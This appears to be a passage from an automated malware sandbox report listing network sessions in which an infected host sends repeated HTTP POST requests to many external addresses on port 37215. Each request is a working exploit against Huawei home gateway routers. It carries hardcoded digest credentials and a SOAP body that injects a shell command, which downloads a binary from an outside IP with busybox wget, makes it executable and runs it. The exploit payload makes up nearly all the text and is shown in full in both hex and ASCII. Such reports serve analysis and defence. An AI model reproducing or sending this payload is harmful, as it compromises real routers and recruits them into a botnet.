                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.473777056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:24.969374895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      26192.168.2.1448642102.15.165.12337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.679083109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.234167099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      27192.168.2.1450910102.236.174.22137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.690362930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.266117096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.938136101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      28192.168.2.1439754102.209.190.10737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.704406023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.042669058 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      29192.168.2.1436294102.30.148.19737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.705991983 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
